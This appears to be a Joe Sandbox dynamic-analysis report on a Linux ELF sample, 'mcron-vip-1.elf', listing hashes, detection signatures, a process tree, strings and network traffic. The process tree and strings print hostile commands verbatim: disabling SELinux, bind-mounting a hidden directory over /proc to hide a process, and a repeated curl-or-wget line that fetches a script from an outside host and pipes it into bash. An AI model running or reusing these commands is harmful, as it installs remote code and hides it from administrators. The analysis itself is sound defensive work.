Create Interactive Tour

Linux Analysis Report
mcron-vip-1.elf

Overview

General Information

Sample name:mcron-vip-1.elf
Analysis ID:1547393
MD5:4e9526bcce8ad234b516a6cf30a4acc9
SHA1:da42a05843d9662a2ee992d52d2c00fd048ae723
SHA256:de490d56cb9a511e4510160281fce2e3a6d9a3596ad7873b9dd7cfd61e52ae3d
Tags:elfuser-abuse_ch
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Executes itself again with its parent PID as an argument (indicative of hampering debugging)
Contains symbols related to standard C library sleeps (sometimes used to evade sandboxing)
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "wget" command typically used for HTTP/S downloading
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample and/or dropped files contains symbols with suspicious names
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1547393
Start date and time:2024-11-02 10:05:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 18s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mcron-vip-1.elf
Detection:MAL
Classification:mal52.evad.linELF@0/1@22/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • VT rate limit hit for: mcron-vip-1.elf
Command:/tmp/mcron-vip-1.elf
PID:5487
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • mcron-vip-1.elf (PID: 5487, Parent: 5412, MD5: 4e9526bcce8ad234b516a6cf30a4acc9) Arguments: /tmp/mcron-vip-1.elf
    • mcron-vip-1.elf New Fork (PID: 5488, Parent: 5487)
      • mcron-vip-1.elf New Fork (PID: 5489, Parent: 5488)
        • sh (PID: 5490, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "setenforce 0 &>/dev/null"
          • sh New Fork (PID: 5491, Parent: 5490)
        • sh (PID: 5492, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mount --bind /tmp/.c /proc/5489"
          • sh New Fork (PID: 5493, Parent: 5492)
          • mount (PID: 5493, Parent: 5492, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount --bind /tmp/.c /proc/5489
        • sh (PID: 5504, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5516, Parent: 5504)
            • sh New Fork (PID: 5518, Parent: 5516)
            • curl (PID: 5518, Parent: 5516, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5516, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5517, Parent: 5504)
          • bash (PID: 5517, Parent: 5504, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5582, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5583, Parent: 5582)
            • sh New Fork (PID: 5585, Parent: 5583)
            • curl (PID: 5585, Parent: 5583, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5583, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5584, Parent: 5582)
          • bash (PID: 5584, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5616, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5617, Parent: 5616)
            • sh New Fork (PID: 5619, Parent: 5617)
            • curl (PID: 5619, Parent: 5617, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5617, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5618, Parent: 5616)
          • bash (PID: 5618, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5656, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5657, Parent: 5656)
            • sh New Fork (PID: 5659, Parent: 5657)
            • curl (PID: 5659, Parent: 5657, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5657, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5658, Parent: 5656)
          • bash (PID: 5658, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5691, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5692, Parent: 5691)
            • sh New Fork (PID: 5694, Parent: 5692)
            • curl (PID: 5694, Parent: 5692, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5692, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5693, Parent: 5691)
          • bash (PID: 5693, Parent: 5691, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5725, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5726, Parent: 5725)
            • sh New Fork (PID: 5728, Parent: 5726)
            • curl (PID: 5728, Parent: 5726, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5726, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5727, Parent: 5725)
          • bash (PID: 5727, Parent: 5725, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5758, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5759, Parent: 5758)
            • sh New Fork (PID: 5761, Parent: 5759)
            • curl (PID: 5761, Parent: 5759, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5759, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5760, Parent: 5758)
          • bash (PID: 5760, Parent: 5758, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5791, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5792, Parent: 5791)
            • sh New Fork (PID: 5794, Parent: 5792)
            • curl (PID: 5794, Parent: 5792, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5792, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5793, Parent: 5791)
          • bash (PID: 5793, Parent: 5791, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
        • sh (PID: 5824, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
          • sh New Fork (PID: 5825, Parent: 5824)
            • sh New Fork (PID: 5827, Parent: 5825)
            • curl (PID: 5827, Parent: 5825, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
          • wget (PID: 5825, Parent: 2955, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
          • sh New Fork (PID: 5826, Parent: 5824)
          • bash (PID: 5826, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
  • udisksd New Fork (PID: 5503, Parent: 803)
  • dumpe2fs (PID: 5503, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: mcron-vip-1.elfReversingLabs: Detection: 34%
Source: mcron-vip-1.elfString: (curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null
Source: mcron-vip-1.elfString: (curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null/var/tmp/.cron/tmp/.cReceived signal , exiting.umount /proc/%dFailed to open PID file: Another instance is already running.Failed to lock PID file: %ldFailed to create temporary directory: mount --bind %s /proc/%dFailed to bind mount /proc/Fork failed.Setsid failed.Second fork failed./Chdir failed./dev/nullsetenforce 0 &>/dev/null
Source: /bin/sh (PID: 5516)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5583)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5617)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5657)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5692)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5726)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5759)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5792)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /bin/sh (PID: 5825)Wget executable: /usr/bin/wget -> wget -q --timeout=10 -O - dl.0889.org/vip-1.shJump to behavior
Source: /usr/bin/curl (PID: 5518)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/wget (PID: 5516)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/curl (PID: 5585)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/wget (PID: 5583)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/curl (PID: 5619)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/wget (PID: 5617)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/curl (PID: 5659)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/wget (PID: 5657)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/curl (PID: 5694)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/wget (PID: 5692)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/curl (PID: 5728)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/wget (PID: 5726)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/curl (PID: 5761)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/wget (PID: 5759)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/curl (PID: 5794)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/wget (PID: 5792)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/curl (PID: 5827)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/wget (PID: 5825)Reads hosts file: /etc/hostsJump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1Host: dl.0889.orgUser-Agent: curl/7.68.0Accept: */*
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: dl.0889.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1Host: dl.0889.orgUser-Agent: curl/7.68.0Accept: */*
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: dl.0889.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1Host: dl.0889.orgUser-Agent: curl/7.68.0Accept: */*
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: dl.0889.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1Host: dl.0889.orgUser-Agent: curl/7.68.0Accept: */*
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: dl.0889.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1Host: dl.0889.orgUser-Agent: curl/7.68.0Accept: */*
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: dl.0889.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1Host: dl.0889.orgUser-Agent: curl/7.68.0Accept: */*
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: dl.0889.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1Host: dl.0889.orgUser-Agent: curl/7.68.0Accept: */*
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: dl.0889.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1Host: dl.0889.orgUser-Agent: curl/7.68.0Accept: */*
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: dl.0889.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1Host: dl.0889.orgUser-Agent: curl/7.68.0Accept: */*
Source: global trafficHTTP traffic detected: GET /vip-1.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: dl.0889.orgConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: dl.0889.org
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:05:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:05:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:06:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:06:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:07:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:07:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:07:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:07:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:08:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:08:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 09:09:53 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
